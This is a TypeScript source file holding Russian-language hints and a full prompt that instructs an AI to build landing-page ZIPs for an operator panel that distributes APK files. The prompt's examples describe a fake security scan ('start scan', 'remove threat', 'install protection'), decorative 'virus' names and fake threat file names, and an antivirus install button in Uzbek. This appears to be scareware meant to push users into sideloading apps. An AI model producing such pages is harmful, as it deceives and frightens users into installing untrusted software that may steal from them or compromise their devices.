/** SSOT: подсказки и промпт для генерации custom landing ZIP через ИИ. */

export const CUSTOM_TEMPLATE_ZIP_HINTS: readonly string[] = [
	'index.html в корне ZIP или в public/. Не смешивай оба варианта.',
	'CSS, JS, картинки - только относительные пути (css/style.css).',
	'APK не клади в ZIP. Билд привязывается к ссылке в панели.',
	'На кнопку «Установить» - class="download-link" на <button> или <a>.',
	'Не пиши свой JS скачивания (createElement("a"), пустой href).',
	'Meta Pixel и /api/download подставляет сервер. Не хардкодь linkId.',
	'Режим «на каждую кнопку» или «на любой клик» - в настройках ссылки.',
	'Лимиты: ZIP до 50 MB, файл до 25 MB.',
];

export const CUSTOM_TEMPLATE_AI_PROMPT = `Ты делаешь статический landing-шаблон (ZIP) для загрузки в панель оператора.

=== СТРУКТУРА ZIP ===

1. Положи index.html в корень архива ИЛИ public/index.html + все ассеты внутри public/.
2. НЕ смешивай: часть файлов в корне, часть в public/ — архив отклонят (mixed_layout).
3. manifest.json не нужен — сервер сгенерирует его сам.
4. Все пути относительные: css/style.css, js/main.js, img/logo.png.
5. Разрешённые типы: .html, .css, .js, .json, изображения (.png, .jpg, .jpeg, .gif, .webp, .svg, .ico и др.), видео (.mp4, .webm и др.), шрифты (.woff, .woff2, .ttf).
6. Лимиты: ZIP до 50 MB, один файл до 25 MB, до 500 файлов.
7. Не клади в ZIP: .apk, .exe, .php, бинарники, скрипты сервера.

=== КАК РАБОТАЕТ СКАЧИВАНИЕ APK (КРИТИЧНО) ===

1. APK НЕ лежит в твоём ZIP. Оператор привязывает билд к ссылке в панели.
2. При открытии лендинга сервер (edge) вставляет в HTML скрипт download-behavior перед </body>.
3. Скрипт находит элементы с class="download-link" и выставляет им:
   href="/api/download?link=XXXXXXXX"
   download="ИмяПриложения.apk"
4. linkId (8 символов) сервер подставляет сам — НЕ хардкодь его в HTML/JS.
5. НЕ добавляй свой код скачивания. НЕ дублируй wiring в main.js — edge уже делает это.

=== КНОПКА УСТАНОВКИ (CTA) ===

1. На финальной кнопке «Установить / Скачать / Yuklab olish» поставь class="download-link".
2. Класс — на самом кликабельном элементе:
   - <button type="button" class="btn download-link">Установить</button>
   - или <a class="download-link" href="#">Установить</a>
3. НЕ вешай download-link на div, p, span, h1, h3 — только на <button> или <a>.
4. НЕ ставь download-link на декоративный текст (имена «вирусов», fake APK в UI).
5. Достаточно 1–2 CTA с download-link на весь лендинг.
6. Многошаговый сценарий (скан → результат → установка) — OK. onclick только для переключения экранов, НЕ для скачивания.

=== ЗАПРЕЩЕНО ===

- Свой JavaScript «скачивания»:
  document.createElement('a'); a.href = ''; a.download = ''; a.click();
- href на index.html, другие .html или пустую строку с атрибутом download (скачается HTML, не APK).
- Фейковые .apk файлы внутри ZIP.
- class="download-link" на не-кликабельных тегах (div, p, span, h1).
- Два атрибута class на одном элементе (<div class="a" class="b"> — невалидный HTML).
- Хардкод /api/download?link=... или linkId в шаблоне.
- Meta Pixel (fbq), Google Analytics — pixel инжектит сервер.
- Формы с POST на свой backend, воронки cookie_pages, telegram-auth — не поддерживаются в custom ZIP.

=== ПРИМЕРЫ ===

ПРАВИЛЬНО — финальная CTA:
<button type="button" class="btn-primary download-link">
  Antivirusni yuklab olish
</button>

ПРАВИЛЬНО — ссылка-кнопка:
<a class="download-link" href="#">Установить приложение</a>

ПРАВИЛЬНО — многошаговый UI без download JS:
<button type="button" id="startScan">Начать проверку</button>
<button type="button" id="removeBtn">Удалить угрозу</button>
<button type="button" class="btn-download download-link">Установить защиту</button>
// JS только: showScreen('scan'), showScreen('result') — без createElement('a') для download

НЕПРАВИЛЬНО — сломанный download (скачает HTML):
dlBtn.onclick = () => {
  const a = document.createElement('a');
  a.href = '';
  a.download = '';
  a.click();
};

НЕПРАВИЛЬНО — download-link не на кнопке:
<button id="dlBtn"><span class="download-link">Скачать</span></button>

НЕПРАВИЛЬНО — декорация:
<h1 class="download-link">Скачайте APK</h1>
<div class="threat-name">IMG_2026.apk</div>  <!-- это текст сценария, не файл -->

=== АЛЬТЕРНАТИВА БЕЗ download-link ===

Если оператор в панели выберет для ссылки режим «скачивание на каждую кнопку» или «на любой клик», edge перехватит клики по button/a. Но свой JS с пустым href всё равно сломает скачивание — его не пиши.

=== ЧЕКЛИСТ ПЕРЕД ВЫДАЧЕЙ ZIP ===

[ ] index.html в корне или public/, без mixed layout
[ ] Нет .apk и исполняемых файлов в архиве
[ ] Финальная CTA: class="download-link" на <button> или <a>
[ ] Нет JS с createElement('a') / пустым href / download HTML-страницы
[ ] Нет download-link на div/p/span/h1
[ ] Нет хардкода linkId и /api/download
[ ] Нет Meta Pixel / fbq в HTML
[ ] Декоративные «имена APK» в тексте — только UI, не файлы и не CTA

После этого опиши дизайн лендинга и сгенерируй index.html (+ css/js при необходимости) одним ZIP.`;
